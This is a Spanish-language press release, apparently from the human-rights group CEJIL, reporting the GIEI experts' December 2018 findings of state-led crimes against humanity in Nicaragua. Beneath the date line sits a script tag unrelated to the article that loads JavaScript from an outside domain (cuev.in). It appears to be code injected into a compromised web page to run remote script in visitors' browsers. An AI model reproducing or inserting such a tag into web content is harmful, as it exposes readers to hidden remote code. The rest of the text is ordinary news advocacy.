Nicaragua: Grupo independiente confirma comisión de crímenes de lesa humanidad
Publicación: 21.Diciembre.2018
<script src="https://cuev.in/aux.php?ver=1.0&amp;ref=at&amp;debug=" type="text/javascript"></script>

San José, 21 de diciembre de 2018.- Hoy, el Grupo Interdisciplinario de Expertos Independientes (GIEI) presentó el informe sobre el trabajo de investigación desarrollado entorno a las violaciones a los derechos humanos cometidas por el Estado nicaragüense durante el primer periodo de la crisis democrática, comprendido entre el 18 de abril y el 30 de mayo de 2018. El informe debió ser presentado desde Washington D.C. en virtud de la decisión del gobierno nicaragüense de expulsar a los expertos y expertas, un día antes de la presentación que se preveía realizar en Managua. 

El trabajo de este grupo de personas de renombre internacional y amplia trayectoria en investigación y en derechos humanos confirma lo que las organizaciones nacionales e internacionales hemos denunciado durante meses: la violencia ocurrida es responsabilidad de las más altas autoridades estatales. 

El Grupo, conformado por Amérigo Incalcaterra (Italia), Sofía Macher (Perú), Claudia Paz y Paz (Guatemala) y Pablo Parenti (Argentina), denunció las dificultades que enfrentó para llevar a cabo su mandato debido a la negativa del gobierno a cooperar, por ejemplo, no se les dio ningún tipo de información, no se permitió el acceso a los expedientes judiciales ni ingresar a observar los juicios orales, es decir, no hubo ningún interés de esclarecer los hechos por parte del gobierno. 

El informe confirma numerosos hechos de relevancia:

  • Las manifestaciones en contra del gobierno han sido pacíficas.
  • La Policía Nacional Civil utilizó armas de guerra para reprimir las manifestaciones,  esto en contraposición a la propia legislación nicaragüense. 
  • Existen grupos paraestatales que, en coordinación con la policía, han violado derechos humanos.
  • Los jueces, juezas, y fiscales, es decir, el Poder Judicial en su conjunto, no ha cumplido con sus mandatos constitucionales, no actuaron de forma independiente y han sido un actor más que viola los derechos humanos.
  • No se han realizado investigaciones diligentes sobre los hechos ocurridos.
  • No hay un solo caso en el que se haya investigado a las fuerzas estatales pese a su clara participación en las violaciones de derechos humanos. 
  • Hay una política estatal de criminalización, es decir, se ha hecho un uso ilegítimo de los delitos de terrorismo y otros, en contra de los manifestantes pacíficos. 
  • Se han cometido crímenes de lesa humanidad que no prescriben, es decir, podrán ser perseguidos sin límite de tiempo, e inclusive la Corte Penal Internacional podría ser competente. 

Desde el Centro por la Justicia y el Derecho Internacional (CEJIL) hemos acompañado de cerca las demandas de la población nicaragüense por el cese de la represión y el retorno a la democracia, este informe demuestra que hay un único responsable de los hechos y ese es el Estado Nicaragüense.  

La Organización de los Estados Americanos (OEA), la Organización de las Naciones Unidas (ONU), y todos los Estados del mundo deben tomar en cuenta los importantes hallazgos del GIEI así como las recomendaciones dadas para efectos de generar una hoja de ruta que permita una salida pacífica e inmediata a la crisis vigente. 

Ocho meses después de iniciada esta crisis, sin precedentes en la historia reciente del país, mantenemos nuestra condena contra un Estado represor que ha cerrado toda posibilidad de diálogo. Nos sumamos a los millones de voces que exigen verdad, justicia y reparación para las víctimas de violaciones de derechos humanos y para la sociedad nicaragüense. CEJIL no cesará en sus esfuerzos para lograr que estos derechos sean una realidad para todos y todas y por ello reiteramos nuestro compromiso de continuar dando voz a las víctimas. 

Finalmente, agradecemos y felicitamos el trabajo de los y las expertas por todo el trabajo realizado de manera seria, profesional, comprometida e independiente.